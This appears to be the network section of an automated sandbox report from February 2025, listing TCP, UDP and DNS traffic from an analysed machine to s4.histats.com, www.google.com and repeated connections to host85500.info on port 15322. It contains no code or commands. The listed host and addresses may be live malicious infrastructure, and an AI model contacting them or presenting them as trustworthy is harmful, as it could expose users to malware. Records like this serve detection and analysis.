                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.282689095 CET4434973954.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.283076048 CET49739443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.283103943 CET4434973954.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.284200907 CET4434973954.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.284281015 CET49739443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.284658909 CET49739443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.284722090 CET4434973954.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.284806013 CET49739443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.284817934 CET4434973954.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.373009920 CET4974015322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.373347044 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.377921104 CET153224974045.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.378145933 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.378242970 CET4974015322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.378429890 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.378429890 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.378577948 CET4974015322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.383183956 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.383429050 CET153224974045.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.387968063 CET4434973954.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.388567924 CET49739443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.389290094 CET49739443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.389312029 CET4434973954.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.061506987 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.061522961 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.061619997 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.071199894 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.071676970 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.075000048 CET153224974045.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.075026989 CET153224974045.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.075078011 CET4974015322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.075614929 CET4974015322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.076009035 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.076466084 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.080400944 CET153224974045.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.276705027 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.284702063 CET153224974045.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.329801083 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.329807043 CET4974015322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384084940 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384136915 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384171963 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384185076 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384193897 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384216070 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384231091 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384243011 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384246111 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384269953 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384941101 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384962082 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384995937 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.385226011 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.385245085 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.385256052 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.385267973 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.385297060 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.385360003 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.432921886 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.489974976 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.534858942 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.814457893 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.814497948 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.818557024 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.818764925 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.818778992 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.461626053 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.469517946 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.469535112 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.470551014 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.470650911 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.480362892 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.480444908 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.536552906 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.536567926 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.580678940 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:38.389884949 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:38.389894009 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:38.389952898 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:39.265290976 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:39.265290976 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:39.270143032 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:39.270262003 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:41.707484007 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:41.707573891 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:41.707607985 CET49736443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.240858078 CET49736443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.240884066 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.708806992 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.708836079 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.708937883 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.725229979 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.725245953 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.308083057 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.308183908 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.363190889 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.363214016 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.363496065 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.363662004 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.367409945 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.411324024 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.490168095 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.490242004 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.490266085 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.490361929 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.491471052 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.491494894 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:45.372728109 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:45.372797966 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:45.372843981 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:45.777489901 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:45.777508974 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.418104887 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.422915936 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.423019886 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.430562973 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.435434103 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.076719046 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.076730967 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.076862097 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.101449013 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.106240988 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.299694061 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.313689947 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.320018053 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:53.282269001 CET153224974045.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:53.282529116 CET153224974045.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:53.282581091 CET4974015322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:55.239195108 CET4974015322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:55.243969917 CET153224974045.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:32.572304964 CET5687853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:32.577208996 CET53568781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:32.577322006 CET5687853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:32.582068920 CET53568781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:33.026823044 CET5687853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:33.031841993 CET53568781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:33.031939030 CET5687853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:34.864906073 CET56893443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:34.864959002 CET44356893142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:34.865052938 CET56893443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:34.865284920 CET56893443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:34.865302086 CET44356893142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:35.515782118 CET44356893142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:35.516330004 CET56893443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:35.516357899 CET44356893142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:35.516685963 CET44356893142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:35.517047882 CET56893443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:35.517132044 CET44356893142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:35.566554070 CET56893443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:36.660382032 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:36.669055939 CET8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:36.669128895 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:45.428385973 CET44356893142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:45.428453922 CET44356893142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:45.428498030 CET56893443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:47.240155935 CET56893443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:47.240166903 CET44356893142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:58:26.390721083 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:58:26.396091938 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:58:26.396155119 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.812167883 CET53582761.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.869518995 CET5330853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.869728088 CET6060653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.872422934 CET53651071.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET53533081.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.891204119 CET53606061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.692760944 CET5746353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.693047047 CET5994453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET53574631.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.700058937 CET53599441.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.866065979 CET53635001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.326689005 CET5487753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.328186035 CET5921253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.355285883 CET53592121.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.370181084 CET53548771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.805114031 CET6255853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.805114031 CET5139453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.812081099 CET53625581.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.812093019 CET53513941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.324790001 CET53633941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.692955017 CET5427753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET53542771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.370151997 CET5085853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.398881912 CET53508581.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:48.260035992 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:48.854669094 CET53565361.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:58.675265074 CET6430353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:58.704420090 CET53643031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:07.588629961 CET53637931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:22.659790039 CET5350353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:22.688606977 CET53535031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:30.028078079 CET53591871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:30.512118101 CET53628021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:32.571749926 CET53570751.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:57.159727097 CET6541953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:57.213608027 CET53654191.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:58:01.089693069 CET53615501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:58:16.192627907 CET5774653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:58:16.220566988 CET53577461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:58:41.111757040 CET53529361.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:58:47.652138948 CET53525721.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:59:02.740971088 CET5258553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Feb 5, 2025 07:59:02.770487070 CET53525851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.869518995 CET192.168.2.41.1.1.10xedb6Standard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.869728088 CET192.168.2.41.1.1.10xa28dStandard query (0)s4.histats.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.692760944 CET192.168.2.41.1.1.10x8049Standard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.693047047 CET192.168.2.41.1.1.10x8deeStandard query (0)s4.histats.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.326689005 CET192.168.2.41.1.1.10xf6e8Standard query (0)host85500.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.328186035 CET192.168.2.41.1.1.10x6c0Standard query (0)_15322._https.host85500.info65IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.805114031 CET192.168.2.41.1.1.10x68daStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.805114031 CET192.168.2.41.1.1.10xb77dStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.692955017 CET192.168.2.41.1.1.10xe6d5Standard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.370151997 CET192.168.2.41.1.1.10x9226Standard query (0)host85500.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:58.675265074 CET192.168.2.41.1.1.10xe168Standard query (0)host85500.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:22.659790039 CET192.168.2.41.1.1.10xca41Standard query (0)host85500.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:57.159727097 CET192.168.2.41.1.1.10x6f44Standard query (0)host85500.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:58:16.192627907 CET192.168.2.41.1.1.10xc9c6Standard query (0)host85500.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:59:02.740971088 CET192.168.2.41.1.1.10xb44Standard query (0)host85500.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com142.4.219.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com158.69.254.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:30.879329920 CET1.1.1.1192.168.2.40xedb6No error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com158.69.254.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com142.4.219.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
